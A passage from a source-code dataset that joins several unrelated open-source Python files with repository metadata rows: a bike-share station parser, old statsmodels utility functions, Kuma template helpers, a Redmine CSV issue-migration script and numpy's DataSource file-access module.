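        # Index the station list by id, then fold each prediction's status into
        # the matching station record before building the station objects.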
station_dict = {station['id']: station for station in data['lists']}
for pred in data['predict']['predictions']['data']:
if pred['sid'] in station_dict:
station_dict[pred['sid']]['status'] = pred['status']
self.stations = map(VCubStation, station_dict.values())
class VCubStation(BikeShareStation):
def __init__(self, fields):
super(VCubStation, self).__init__()
self.name = fields['name']
self.latitude = float(fields['latitude'])
self.longitude = float(fields['longitude'])
self.extra = {
'uid': str(fields['id']),
'last_update': fields['updatedAt'],
'address': fields['address'],
'city': fields['city'],
'online': fields['connexionState'] == 'CONNECTEE',
'status': int(fields['status']) # 0: maintenance, 1: operating
}
if self.extra['status'] == 1 and self.extra['online']:
ebikes = int(fields['nbElectricBikeAvailable'])
manual_bikes = int(fields['nbBikeAvailable'])
self.bikes = ebikes + manual_bikes
self.free = int(fields['nbPlaceAvailable'])
self.extra['slots'] = self.bikes + self.free
self.extra['ebikes'] = ebikes
self.extra['has_ebikes'] = ebikes > 0
| lgpl-3.0 | 1,940,034,154,309,682,200 | 33.252918 | 106 | 0.536522 | false |
pprett/statsmodels | statsmodels/sandbox/utils_old.py | 6 | 4092 | import numpy as np
import numpy.linalg as L
import scipy.interpolate
import scipy.linalg
__docformat__ = 'restructuredtext'
def recipr(X):
"""
Return the reciprocal of an array, setting all entries less than or
equal to 0 to 0. Therefore, it presumes that X should be positive in
general.
"""
x = np.maximum(np.asarray(X).astype(np.float64), 0)
return np.greater(x, 0.) / (x + np.less_equal(x, 0.))
def mad(a, c=0.6745, axis=0):
"""
Median Absolute Deviation:
median(abs(a - median(a))) / c
"""
_shape = a.shape
a.shape = np.product(a.shape,axis=0)
m = np.median(np.fabs(a - np.median(a))) / c
a.shape = _shape
return m
def recipr0(X):
"""
Return the reciprocal of an array, setting all entries equal to 0
as 0. It does not assume that X should be positive in
general.
"""
test = np.equal(np.asarray(X), 0)
return np.where(test, 0, 1. / X)
def clean0(matrix):
"""
Erase columns of zeros: can save some time in pseudoinverse.
"""
colsum = np.add.reduce(matrix**2, 0)
val = [matrix[:,i] for i in np.flatnonzero(colsum)]
return np.array(np.transpose(val))
def rank(X, cond=1.0e-12):
"""
Return the rank of a matrix X based on its generalized inverse,
not the SVD.
"""
X = np.asarray(X)
if len(X.shape) == 2:
D = scipy.linalg.svdvals(X)
return int(np.add.reduce(np.greater(D / D.max(), cond).astype(np.int32)))
else:
return int(not np.alltrue(np.equal(X, 0.)))
def fullrank(X, r=None):
"""
Return a matrix whose column span is the same as X.
If the rank of X is known it can be specified as r -- no check
is made to ensure that this really is the rank of X.
"""
if r is None:
r = rank(X)
V, D, U = L.svd(X, full_matrices=0)
order = np.argsort(D)
order = order[::-1]
value = []
for i in range(r):
value.append(V[:,order[i]])
return np.asarray(np.transpose(value)).astype(np.float64)
class StepFunction:
"""
A basic step function: values at the ends are handled in the simplest
way possible: everything to the left of x[0] is set to ival; everything
to the right of x[-1] is set to y[-1].
Examples
--------
>>> from numpy import arange
>>> from nipy.fixes.scipy.stats.models.utils import StepFunction
>>>
>>> x = arange(20)
>>> y = arange(20)
>>> f = StepFunction(x, y)
>>>
>>> print f(3.2)
3.0
>>> print f([[3.2,4.5],[24,-3.1]])
[[ 3. 4.]
[ 19. 0.]]
"""
def __init__(self, x, y, ival=0., sorted=False):
_x = np.asarray(x)
_y = np.asarray(y)
if _x.shape != _y.shape:
raise ValueError, 'in StepFunction: x and y do not have the same shape'
if len(_x.shape) != 1:
raise ValueError, 'in StepFunction: x and y must be 1-dimensional'
self.x = np.hstack([[-np.inf], _x])
self.y = np.hstack([[ival], _y])
if not sorted:
asort = np.argsort(self.x)
self.x = np.take(self.x, asort, 0)
self.y = np.take(self.y, asort, 0)
self.n = self.x.shape[0]
def __call__(self, time):
tind = np.searchsorted(self.x, time) - 1
_shape = tind.shape
return self.y[tind]
def ECDF(values):
"""
Return the ECDF of an array as a step function.
"""
x = np.array(values, copy=True)
x.sort()
x.shape = np.product(x.shape,axis=0)
n = x.shape[0]
y = (np.arange(n) + 1.) / n
return StepFunction(x, y)
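# Illustrative use of ECDF(): for values [1., 2., 3.] the returned step
# function is 0 left of 1, then jumps to 1/3, 2/3 and 1.0 at the data points:
#   cdf = ECDF([1., 2., 3.])
#   cdf(0.0)   # -> 0.0
#   cdf(2.5)   # -> 0.666...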
def monotone_fn_inverter(fn, x, vectorized=True, **keywords):
"""
Given a monotone function x (no checking is done to verify monotonicity)
and a set of x values, return an linearly interpolated approximation
to its inverse from its values on x.
"""
if vectorized:
y = fn(x, **keywords)
else:
y = []
for _x in x:
y.append(fn(_x, **keywords))
y = np.array(y)
a = np.argsort(y)
return scipy.interpolate.interp1d(y[a], x[a])
| bsd-3-clause | 2,588,370,655,548,307,500 | 25.4 | 83 | 0.572825 | false |
jezdez/kuma | kuma/core/helpers.py | 3 | 10377 | import datetime
import HTMLParser
import json
import urllib
import bleach
import jinja2
import pytz
from babel import localedata
from babel.dates import format_date, format_datetime, format_time
from babel.numbers import format_decimal
from django.conf import settings
from django.contrib.messages.storage.base import LEVEL_TAGS
from django.contrib.staticfiles.storage import staticfiles_storage
from django.template import defaultfilters
from django.utils.encoding import force_text
from django.utils.html import strip_tags
from django.utils.timezone import get_default_timezone
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext
from jingo import env, register
from pytz import timezone
from soapbox.models import Message
from statici18n.templatetags.statici18n import statici18n
from urlobject import URLObject
from .exceptions import DateTimeFormatError
from .urlresolvers import reverse, split_path
htmlparser = HTMLParser.HTMLParser()
# Yanking filters from Django and 3rd party libs.
register.filter(strip_tags)
register.filter(defaultfilters.timesince)
register.filter(defaultfilters.truncatewords)
register.function(statici18n)
@register.filter
def paginator(pager):
"""Render list of pages."""
return Paginator(pager).render()
@register.function
def url(viewname, *args, **kwargs):
"""Helper for Django's ``reverse`` in templates."""
locale = kwargs.pop('locale', None)
return reverse(viewname, args=args, kwargs=kwargs, locale=locale)
class Paginator(object):
def __init__(self, pager):
self.pager = pager
self.max = 10
self.span = (self.max - 1) / 2
self.page = pager.number
self.num_pages = pager.paginator.num_pages
self.count = pager.paginator.count
pager.page_range = self.range()
pager.dotted_upper = self.num_pages not in pager.page_range
pager.dotted_lower = 1 not in pager.page_range
def range(self):
"""Return a list of page numbers to show in the paginator."""
page, total, span = self.page, self.num_pages, self.span
if total < self.max:
lower, upper = 0, total
elif page < span + 1:
lower, upper = 0, span * 2
elif page > total - span:
lower, upper = total - span * 2, total
else:
lower, upper = page - span, page + span - 1
return range(max(lower + 1, 1), min(total, upper) + 1)
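    # Example of the windowing above (numbers assumed, not from a real
    # request): with the defaults max=10 and span=4, a paginator on page 7 of
    # 20 pages computes lower, upper = 3, 10 and therefore shows
    # page_range = [4, 5, 6, 7, 8, 9, 10].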
def render(self):
c = {'pager': self.pager, 'num_pages': self.num_pages,
'count': self.count}
t = env.get_template('includes/paginator.html').render(c)
return jinja2.Markup(t)
@register.filter
def timesince(d, now=None):
"""Take two datetime objects and return the time between d and now as a
nicely formatted string, e.g. "10 minutes". If d is None or occurs after
now, return ''.
Units used are years, months, weeks, days, hours, and minutes. Seconds and
microseconds are ignored. Just one unit is displayed. For example,
"2 weeks" and "1 year" are possible outputs, but "2 weeks, 3 days" and "1
year, 5 months" are not.
Adapted from django.utils.timesince to have better i18n (not assuming
commas as list separators and including "ago" so order of words isn't
assumed), show only one time unit, and include seconds.
"""
if d is None:
return u''
chunks = [
(60 * 60 * 24 * 365, lambda n: ungettext('%(number)d year ago',
'%(number)d years ago', n)),
(60 * 60 * 24 * 30, lambda n: ungettext('%(number)d month ago',
'%(number)d months ago', n)),
(60 * 60 * 24 * 7, lambda n: ungettext('%(number)d week ago',
'%(number)d weeks ago', n)),
(60 * 60 * 24, lambda n: ungettext('%(number)d day ago',
'%(number)d days ago', n)),
(60 * 60, lambda n: ungettext('%(number)d hour ago',
'%(number)d hours ago', n)),
(60, lambda n: ungettext('%(number)d minute ago',
'%(number)d minutes ago', n)),
(1, lambda n: ungettext('%(number)d second ago',
'%(number)d seconds ago', n))]
if not now:
if d.tzinfo:
now = datetime.datetime.now(get_default_timezone())
else:
now = datetime.datetime.now()
# Ignore microsecond part of 'd' since we removed it from 'now'
delta = now - (d - datetime.timedelta(0, 0, d.microsecond))
since = delta.days * 24 * 60 * 60 + delta.seconds
if since <= 0:
# d is in the future compared to now, stop processing.
return u''
for i, (seconds, name) in enumerate(chunks):
count = since // seconds
if count != 0:
break
return name(count) % {'number': count}
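# Example (timestamps invented): with now = 2015-01-01 12:00 and
# d = 2015-01-01 09:30 the delta is 9000 seconds, the first matching chunk is
# the hour one with count 2, so the filter returns the localised form of
# "2 hours ago".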
@register.filter
def yesno(boolean_value):
return jinja2.Markup(_(u'Yes') if boolean_value else _(u'No'))
@register.filter
def entity_decode(str):
"""Turn HTML entities in a string into unicode."""
return htmlparser.unescape(str)
@register.function
def page_title(title):
return u'%s | MDN' % title
@register.filter
def level_tag(message):
return jinja2.Markup(force_text(LEVEL_TAGS.get(message.level, ''),
strings_only=True))
@register.filter
def isotime(t):
"""Date/Time format according to ISO 8601"""
if not hasattr(t, 'tzinfo'):
return
return _append_tz(t).astimezone(pytz.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
def _append_tz(t):
tz = pytz.timezone(settings.TIME_ZONE)
return tz.localize(t)
@register.function
def thisyear():
"""The current year."""
return jinja2.Markup(datetime.date.today().year)
@register.filter
def cleank(txt):
"""Clean and link some user-supplied text."""
return jinja2.Markup(bleach.linkify(bleach.clean(txt)))
@register.filter
def urlencode(txt):
"""Url encode a path."""
return urllib.quote_plus(txt.encode('utf8'))
@register.filter
def jsonencode(data):
return jinja2.Markup(json.dumps(data))
@register.function
def get_soapbox_messages(url):
_, path = split_path(url)
return Message.objects.match(path)
@register.function
def get_webfont_attributes(request):
"""
    Return data attributes based on assumptions about whether the user has the web fonts cached
"""
if not request:
return ''
assume_loaded = 'true'
if request.META.get('HTTP_PRAGMA') == 'no-cache':
assume_loaded = 'false'
elif request.META.get('HTTP_CACHE_CONTROL') == 'no-cache':
assume_loaded = 'false'
elif request.COOKIES.get('ffo', 'false') == 'true':
assume_loaded = 'true'
else:
assume_loaded = 'false'
font_names = ['opensanslight', 'opensans']
font_attributes = ''
for font_name in font_names:
        font_attributes += ' data-ffo-' + font_name + '=' + assume_loaded
return font_attributes
@register.inclusion_tag('core/elements/soapbox_messages.html')
def soapbox_messages(soapbox_messages):
return {'soapbox_messages': soapbox_messages}
@register.function
def add_utm(url_, campaign, source='developer.mozilla.org', medium='email'):
"""Add the utm_* tracking parameters to a URL."""
url_obj = URLObject(url_).add_query_params({
'utm_campaign': campaign,
'utm_source': source,
'utm_medium': medium})
return str(url_obj)
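# Illustrative call (URL invented): add_utm('https://example.com/docs', 'spring-campaign')
# returns the same URL with utm_campaign=spring-campaign,
# utm_source=developer.mozilla.org and utm_medium=email added as query
# parameters; the parameter order in the result is up to URLObject.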
def _babel_locale(locale):
"""Return the Babel locale code, given a normal one."""
# Babel uses underscore as separator.
return locale.replace('-', '_')
def _contextual_locale(context):
"""Return locale from the context, falling back to a default if invalid."""
locale = context['request'].LANGUAGE_CODE
if not localedata.exists(locale):
locale = settings.LANGUAGE_CODE
return locale
@register.function
@jinja2.contextfunction
def datetimeformat(context, value, format='shortdatetime', output='html'):
"""
Returns date/time formatted using babel's locale settings. Uses the
timezone from settings.py
"""
if not isinstance(value, datetime.datetime):
if isinstance(value, datetime.date):
# Turn a date into a datetime
value = datetime.datetime.combine(value,
datetime.datetime.min.time())
else:
# Expecting datetime value
raise ValueError
default_tz = timezone(settings.TIME_ZONE)
tzvalue = default_tz.localize(value)
user = context['request'].user
try:
if user.is_authenticated() and user.timezone:
user_tz = timezone(user.timezone)
tzvalue = user_tz.normalize(tzvalue.astimezone(user_tz))
except AttributeError:
pass
locale = _babel_locale(_contextual_locale(context))
# If within a day, 24 * 60 * 60 = 86400s
if format == 'shortdatetime':
# Check if the date is today
if value.toordinal() == datetime.date.today().toordinal():
formatted = _(u'Today at %s') % format_time(
tzvalue, format='short', locale=locale)
else:
formatted = format_datetime(tzvalue, format='short', locale=locale)
elif format == 'longdatetime':
formatted = format_datetime(tzvalue, format='long', locale=locale)
elif format == 'date':
formatted = format_date(tzvalue, locale=locale)
elif format == 'time':
formatted = format_time(tzvalue, locale=locale)
elif format == 'datetime':
formatted = format_datetime(tzvalue, locale=locale)
else:
# Unknown format
raise DateTimeFormatError
if output == 'json':
return formatted
return jinja2.Markup('<time datetime="%s">%s</time>' %
(tzvalue.isoformat(), formatted))
@register.function
@jinja2.contextfunction
def number(context, n):
"""Return the localized representation of an integer or decimal.
For None, print nothing.
"""
if n is None:
return ''
return format_decimal(n, locale=_babel_locale(_contextual_locale(context)))
@register.function
def static(path):
return staticfiles_storage.url(path)
| mpl-2.0 | -76,533,547,199,793,220 | 30.445455 | 79 | 0.630818 | false |
invenfantasy/software-factory | tools/sfmigration/examples/from_csv/export_issues.py | 1 | 2858 | #!/usr/bin/python
#
# Copyright (C) 2014 eNovance SAS <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os.path
from sfmigration.common.softwarefactory import SFRedmineMigrator
from sfmigration.common import utils
from sfmigration.issues.csvfile import CSVImporter, REDMINE_ISSUE_FIELDS
logger = utils.logger
def get_values(config_file='config.ini'):
    # check that the config file is present
    if not os.path.isfile(config_file):
        logger.error("config file %s is missing" % config_file)
        raise IOError("config file %s is missing" % config_file)
source_csv = {'csv_file': '',
'fieldnames': ''}
for key in source_csv.iterkeys():
source_csv[key] = utils.get_config_value(config_file,
'CSV', key)
mapping = {}
for field in REDMINE_ISSUE_FIELDS:
mapping[field] = utils.get_config_value(config_file,
'CSV', field)
source_csv['fieldnames_mapping'] = mapping
dest_redmine = {'username': '', 'password': '',
'id': '', 'url': '', 'name': '',
'sf_domain': '', 'versions_to_skip': [],
'issues_to_skip': []}
for key in dest_redmine.iterkeys():
dest_redmine[key] = utils.get_config_value(config_file,
'DEST_REDMINE', key)
# if url ends with backslash, remove it before use.
if dest_redmine['url'].endswith('/'):
dest_redmine['url'] = dest_redmine['url'][:-1]
versions_to_skip = utils.get_config_value(config_file,
'SKIP', 'version_id')
if versions_to_skip:
dest_redmine['versions_to_skip'] = versions_to_skip.split(',')
issues_to_skip = utils.get_config_value(config_file,
'SKIP', 'issue_id')
if issues_to_skip:
dest_redmine['issues_to_skip'] = issues_to_skip.split(',')
    dest_redmine['mapper'] = utils.ConfigMapper(config_file)
return source_csv, dest_redmine
def main(config_file='config.ini'):
    source_csv, dest_redmine = get_values(config_file)
    try:
        source = CSVImporter(**source_csv)
    except Exception as e:
        logger.error(str(e))
        raise
target = SFRedmineMigrator(**dest_redmine)
target.migrate(source)
if __name__ == "__main__":
main()
| apache-2.0 | 8,085,852,480,952,090,000 | 37.621622 | 75 | 0.59972 | false |
pdebuyl/numpy | numpy/lib/_datasource.py | 7 | 22792 | """A file interface for handling local and remote data files.
The goal of datasource is to abstract some of the file system operations
when dealing with data files so the researcher doesn't have to know all the
low-level details. Through datasource, a researcher can obtain and use a
file with one function call, regardless of location of the file.
DataSource is meant to augment standard python libraries, not replace them.
It should work seamlessly with standard file IO operations and the os
module.
DataSource files can originate locally or remotely:
- local files : '/home/guido/src/local/data.txt'
- URLs (http, ftp, ...) : 'http://www.scipy.org/not/real/data.txt'
DataSource files can also be compressed or uncompressed. Currently only
gzip, bz2 and xz are supported.
Example::
>>> # Create a DataSource, use os.curdir (default) for local storage.
>>> from numpy import DataSource
>>> ds = DataSource()
>>>
>>> # Open a remote file.
>>> # DataSource downloads the file, stores it locally in:
>>> # './www.google.com/index.html'
>>> # opens the file and returns a file object.
>>> fp = ds.open('http://www.google.com/') # doctest: +SKIP
>>>
>>> # Use the file as you normally would
>>> fp.read() # doctest: +SKIP
>>> fp.close() # doctest: +SKIP
"""
import os
import shutil
import io
from contextlib import closing
from numpy.core.overrides import set_module
_open = open
def _check_mode(mode, encoding, newline):
"""Check mode and that encoding and newline are compatible.
Parameters
----------
mode : str
File open mode.
encoding : str
File encoding.
newline : str
Newline for text files.
"""
if "t" in mode:
if "b" in mode:
raise ValueError("Invalid mode: %r" % (mode,))
else:
if encoding is not None:
raise ValueError("Argument 'encoding' not supported in binary mode")
if newline is not None:
raise ValueError("Argument 'newline' not supported in binary mode")
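# For example, _check_mode('rt', encoding='utf-8', newline='') passes, while
# _check_mode('rb', encoding='utf-8', newline=None) raises ValueError because
# encodings only apply to text mode.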
# Using a class instead of a module-level dictionary
# to reduce the initial 'import numpy' overhead by
# deferring the import of lzma, bz2 and gzip until needed
# TODO: .zip support, .tar support?
class _FileOpeners:
"""
Container for different methods to open (un-)compressed files.
`_FileOpeners` contains a dictionary that holds one method for each
supported file format. Attribute lookup is implemented in such a way
that an instance of `_FileOpeners` itself can be indexed with the keys
of that dictionary. Currently uncompressed files as well as files
compressed with ``gzip``, ``bz2`` or ``xz`` compression are supported.
Notes
-----
`_file_openers`, an instance of `_FileOpeners`, is made available for
use in the `_datasource` module.
Examples
--------
>>> import gzip
>>> np.lib._datasource._file_openers.keys()
[None, '.bz2', '.gz', '.xz', '.lzma']
>>> np.lib._datasource._file_openers['.gz'] is gzip.open
True
"""
def __init__(self):
self._loaded = False
self._file_openers = {None: io.open}
def _load(self):
if self._loaded:
return
try:
import bz2
self._file_openers[".bz2"] = bz2.open
except ImportError:
pass
try:
import gzip
self._file_openers[".gz"] = gzip.open
except ImportError:
pass
try:
import lzma
self._file_openers[".xz"] = lzma.open
self._file_openers[".lzma"] = lzma.open
except (ImportError, AttributeError):
# There are incompatible backports of lzma that do not have the
# lzma.open attribute, so catch that as well as ImportError.
pass
self._loaded = True
def keys(self):
"""
Return the keys of currently supported file openers.
Parameters
----------
None
Returns
-------
keys : list
The keys are None for uncompressed files and the file extension
strings (i.e. ``'.gz'``, ``'.xz'``) for supported compression
methods.
"""
self._load()
return list(self._file_openers.keys())
def __getitem__(self, key):
self._load()
return self._file_openers[key]
_file_openers = _FileOpeners()
def open(path, mode='r', destpath=os.curdir, encoding=None, newline=None):
"""
Open `path` with `mode` and return the file object.
If ``path`` is an URL, it will be downloaded, stored in the
`DataSource` `destpath` directory and opened from there.
Parameters
----------
path : str
Local file path or URL to open.
mode : str, optional
Mode to open `path`. Mode 'r' for reading, 'w' for writing, 'a' to
append. Available modes depend on the type of object specified by
path. Default is 'r'.
destpath : str, optional
Path to the directory where the source file gets downloaded to for
use. If `destpath` is None, a temporary directory will be created.
The default path is the current directory.
encoding : {None, str}, optional
Open text file with given encoding. The default encoding will be
what `io.open` uses.
newline : {None, str}, optional
Newline to use when reading text file.
Returns
-------
out : file object
The opened file.
Notes
-----
This is a convenience function that instantiates a `DataSource` and
returns the file object from ``DataSource.open(path)``.
"""
ds = DataSource(destpath)
return ds.open(path, mode, encoding=encoding, newline=newline)
@set_module('numpy')
class DataSource:
"""
DataSource(destpath='.')
A generic data source file (file, http, ftp, ...).
DataSources can be local files or remote files/URLs. The files may
also be compressed or uncompressed. DataSource hides some of the
low-level details of downloading the file, allowing you to simply pass
in a valid file path (or URL) and obtain a file object.
Parameters
----------
destpath : str or None, optional
Path to the directory where the source file gets downloaded to for
use. If `destpath` is None, a temporary directory will be created.
The default path is the current directory.
Notes
-----
URLs require a scheme string (``http://``) to be used, without it they
will fail::
>>> repos = np.DataSource()
>>> repos.exists('www.google.com/index.html')
False
>>> repos.exists('http://www.google.com/index.html')
True
Temporary directories are deleted when the DataSource is deleted.
Examples
--------
::
>>> ds = np.DataSource('/home/guido')
>>> urlname = 'http://www.google.com/'
>>> gfile = ds.open('http://www.google.com/')
>>> ds.abspath(urlname)
'/home/guido/www.google.com/index.html'
>>> ds = np.DataSource(None) # use with temporary file
>>> ds.open('/home/guido/foobar.txt')
    <open file '/home/guido/foobar.txt', mode 'r' at 0x91d4430>
>>> ds.abspath('/home/guido/foobar.txt')
'/tmp/.../home/guido/foobar.txt'
"""
def __init__(self, destpath=os.curdir):
"""Create a DataSource with a local path at destpath."""
if destpath:
self._destpath = os.path.abspath(destpath)
self._istmpdest = False
else:
import tempfile # deferring import to improve startup time
self._destpath = tempfile.mkdtemp()
self._istmpdest = True
def __del__(self):
# Remove temp directories
if hasattr(self, '_istmpdest') and self._istmpdest:
shutil.rmtree(self._destpath)
def _iszip(self, filename):
"""Test if the filename is a zip file by looking at the file extension.
"""
fname, ext = os.path.splitext(filename)
return ext in _file_openers.keys()
def _iswritemode(self, mode):
"""Test if the given mode will open a file for writing."""
# Currently only used to test the bz2 files.
_writemodes = ("w", "+")
for c in mode:
if c in _writemodes:
return True
return False
def _splitzipext(self, filename):
"""Split zip extension from filename and return filename.
*Returns*:
base, zip_ext : {tuple}
"""
if self._iszip(filename):
return os.path.splitext(filename)
else:
return filename, None
def _possible_names(self, filename):
"""Return a tuple containing compressed filename variations."""
names = [filename]
if not self._iszip(filename):
for zipext in _file_openers.keys():
if zipext:
names.append(filename+zipext)
return names
def _isurl(self, path):
"""Test if path is a net location. Tests the scheme and netloc."""
# We do this here to reduce the 'import numpy' initial import time.
from urllib.parse import urlparse
# BUG : URLs require a scheme string ('http://') to be used.
# www.google.com will fail.
# Should we prepend the scheme for those that don't have it and
# test that also? Similar to the way we append .gz and test for
# for compressed versions of files.
scheme, netloc, upath, uparams, uquery, ufrag = urlparse(path)
return bool(scheme and netloc)
def _cache(self, path):
"""Cache the file specified by path.
Creates a copy of the file in the datasource cache.
"""
# We import these here because importing urllib is slow and
# a significant fraction of numpy's total import time.
from urllib.request import urlopen
from urllib.error import URLError
upath = self.abspath(path)
# ensure directory exists
if not os.path.exists(os.path.dirname(upath)):
os.makedirs(os.path.dirname(upath))
# TODO: Doesn't handle compressed files!
if self._isurl(path):
try:
with closing(urlopen(path)) as openedurl:
with _open(upath, 'wb') as f:
shutil.copyfileobj(openedurl, f)
except URLError:
raise URLError("URL not found: %s" % path)
else:
shutil.copyfile(path, upath)
return upath
def _findfile(self, path):
"""Searches for ``path`` and returns full path if found.
If path is an URL, _findfile will cache a local copy and return the
path to the cached file. If path is a local file, _findfile will
return a path to that local file.
The search will include possible compressed versions of the file
and return the first occurrence found.
"""
# Build list of possible local file paths
if not self._isurl(path):
# Valid local paths
filelist = self._possible_names(path)
# Paths in self._destpath
filelist += self._possible_names(self.abspath(path))
else:
# Cached URLs in self._destpath
filelist = self._possible_names(self.abspath(path))
# Remote URLs
filelist = filelist + self._possible_names(path)
for name in filelist:
if self.exists(name):
if self._isurl(name):
name = self._cache(name)
return name
return None
def abspath(self, path):
"""
Return absolute path of file in the DataSource directory.
If `path` is an URL, then `abspath` will return either the location
the file exists locally or the location it would exist when opened
using the `open` method.
Parameters
----------
path : str
Can be a local file or a remote URL.
Returns
-------
out : str
Complete path, including the `DataSource` destination directory.
Notes
-----
The functionality is based on `os.path.abspath`.
"""
# We do this here to reduce the 'import numpy' initial import time.
from urllib.parse import urlparse
# TODO: This should be more robust. Handles case where path includes
# the destpath, but not other sub-paths. Failing case:
# path = /home/guido/datafile.txt
# destpath = /home/alex/
# upath = self.abspath(path)
# upath == '/home/alex/home/guido/datafile.txt'
# handle case where path includes self._destpath
splitpath = path.split(self._destpath, 2)
if len(splitpath) > 1:
path = splitpath[1]
scheme, netloc, upath, uparams, uquery, ufrag = urlparse(path)
netloc = self._sanitize_relative_path(netloc)
upath = self._sanitize_relative_path(upath)
return os.path.join(self._destpath, netloc, upath)
def _sanitize_relative_path(self, path):
"""Return a sanitised relative path for which
os.path.abspath(os.path.join(base, path)).startswith(base)
"""
last = None
path = os.path.normpath(path)
while path != last:
last = path
# Note: os.path.join treats '/' as os.sep on Windows
path = path.lstrip(os.sep).lstrip('/')
path = path.lstrip(os.pardir).lstrip('..')
drive, path = os.path.splitdrive(path) # for Windows
return path
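    # Example: a hostile or absolute input such as '/../../etc/passwd' is
    # reduced to 'etc/passwd', so the os.path.join in abspath() above cannot
    # escape self._destpath.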
def exists(self, path):
"""
Test if path exists.
Test if `path` exists as (and in this order):
- a local file.
- a remote URL that has been downloaded and stored locally in the
`DataSource` directory.
- a remote URL that has not been downloaded, but is valid and
accessible.
Parameters
----------
path : str
Can be a local file or a remote URL.
Returns
-------
out : bool
True if `path` exists.
Notes
-----
When `path` is an URL, `exists` will return True if it's either
stored locally in the `DataSource` directory, or is a valid remote
URL. `DataSource` does not discriminate between the two, the file
is accessible if it exists in either location.
"""
# First test for local path
if os.path.exists(path):
return True
# We import this here because importing urllib is slow and
# a significant fraction of numpy's total import time.
from urllib.request import urlopen
from urllib.error import URLError
# Test cached url
upath = self.abspath(path)
if os.path.exists(upath):
return True
# Test remote url
if self._isurl(path):
try:
netfile = urlopen(path)
netfile.close()
del(netfile)
return True
except URLError:
return False
return False
def open(self, path, mode='r', encoding=None, newline=None):
"""
Open and return file-like object.
If `path` is an URL, it will be downloaded, stored in the
`DataSource` directory and opened from there.
Parameters
----------
path : str
Local file path or URL to open.
mode : {'r', 'w', 'a'}, optional
Mode to open `path`. Mode 'r' for reading, 'w' for writing,
'a' to append. Available modes depend on the type of object
specified by `path`. Default is 'r'.
encoding : {None, str}, optional
Open text file with given encoding. The default encoding will be
what `io.open` uses.
newline : {None, str}, optional
Newline to use when reading text file.
Returns
-------
out : file object
File object.
"""
# TODO: There is no support for opening a file for writing which
# doesn't exist yet (creating a file). Should there be?
# TODO: Add a ``subdir`` parameter for specifying the subdirectory
# used to store URLs in self._destpath.
if self._isurl(path) and self._iswritemode(mode):
raise ValueError("URLs are not writeable")
# NOTE: _findfile will fail on a new file opened for writing.
found = self._findfile(path)
if found:
_fname, ext = self._splitzipext(found)
            if ext == '.bz2':
                mode = mode.replace("+", "")
return _file_openers[ext](found, mode=mode,
encoding=encoding, newline=newline)
else:
raise IOError("%s not found." % path)
class Repository (DataSource):
"""
Repository(baseurl, destpath='.')
A data repository where multiple DataSource's share a base
URL/directory.
`Repository` extends `DataSource` by prepending a base URL (or
directory) to all the files it handles. Use `Repository` when you will
be working with multiple files from one base URL. Initialize
`Repository` with the base URL, then refer to each file by its filename
only.
Parameters
----------
baseurl : str
Path to the local directory or remote location that contains the
data files.
destpath : str or None, optional
Path to the directory where the source file gets downloaded to for
use. If `destpath` is None, a temporary directory will be created.
The default path is the current directory.
Examples
--------
To analyze all files in the repository, do something like this
(note: this is not self-contained code)::
>>> repos = np.lib._datasource.Repository('/home/user/data/dir/')
>>> for filename in filelist:
... fp = repos.open(filename)
... fp.analyze()
... fp.close()
Similarly you could use a URL for a repository::
>>> repos = np.lib._datasource.Repository('http://www.xyz.edu/data')
"""
def __init__(self, baseurl, destpath=os.curdir):
"""Create a Repository with a shared url or directory of baseurl."""
DataSource.__init__(self, destpath=destpath)
self._baseurl = baseurl
def __del__(self):
DataSource.__del__(self)
def _fullpath(self, path):
"""Return complete path for path. Prepends baseurl if necessary."""
splitpath = path.split(self._baseurl, 2)
if len(splitpath) == 1:
result = os.path.join(self._baseurl, path)
else:
result = path # path contains baseurl already
return result
def _findfile(self, path):
"""Extend DataSource method to prepend baseurl to ``path``."""
return DataSource._findfile(self, self._fullpath(path))
def abspath(self, path):
"""
Return absolute path of file in the Repository directory.
If `path` is an URL, then `abspath` will return either the location
the file exists locally or the location it would exist when opened
using the `open` method.
Parameters
----------
path : str
Can be a local file or a remote URL. This may, but does not
have to, include the `baseurl` with which the `Repository` was
initialized.
Returns
-------
out : str
Complete path, including the `DataSource` destination directory.
"""
return DataSource.abspath(self, self._fullpath(path))
def exists(self, path):
"""
Test if path exists prepending Repository base URL to path.
Test if `path` exists as (and in this order):
- a local file.
- a remote URL that has been downloaded and stored locally in the
`DataSource` directory.
- a remote URL that has not been downloaded, but is valid and
accessible.
Parameters
----------
path : str
Can be a local file or a remote URL. This may, but does not
have to, include the `baseurl` with which the `Repository` was
initialized.
Returns
-------
out : bool
True if `path` exists.
Notes
-----
When `path` is an URL, `exists` will return True if it's either
stored locally in the `DataSource` directory, or is a valid remote
URL. `DataSource` does not discriminate between the two, the file
is accessible if it exists in either location.
"""
return DataSource.exists(self, self._fullpath(path))
def open(self, path, mode='r', encoding=None, newline=None):
"""
Open and return file-like object prepending Repository base URL.
If `path` is an URL, it will be downloaded, stored in the
DataSource directory and opened from there.
Parameters
----------
path : str
Local file path or URL to open. This may, but does not have to,
include the `baseurl` with which the `Repository` was
initialized.
mode : {'r', 'w', 'a'}, optional
Mode to open `path`. Mode 'r' for reading, 'w' for writing,
'a' to append. Available modes depend on the type of object
specified by `path`. Default is 'r'.
encoding : {None, str}, optional
Open text file with given encoding. The default encoding will be
what `io.open` uses.
newline : {None, str}, optional
Newline to use when reading text file.
Returns
-------
out : file object
File object.
"""
return DataSource.open(self, self._fullpath(path), mode,
encoding=encoding, newline=newline)
def listdir(self):
"""
List files in the source Repository.
Returns
-------
files : list of str
List of file names (not containing a directory part).
Notes
-----
Does not currently work for remote repositories.
"""
if self._isurl(self._baseurl):
raise NotImplementedError(
"Directory listing of URLs, not supported yet.")
else:
return os.listdir(self._baseurl)
| bsd-3-clause | -2,557,301,246,969,299,500 | 31.283286 | 80 | 0.584591 | false |
amanwriter/vyked | vyked/__init__.py | 1 | 1035 | __all__ = ['Host', 'TCPServiceClient', 'TCPService', 'HTTPService', 'HTTPServiceClient', 'api', 'request', 'subscribe',
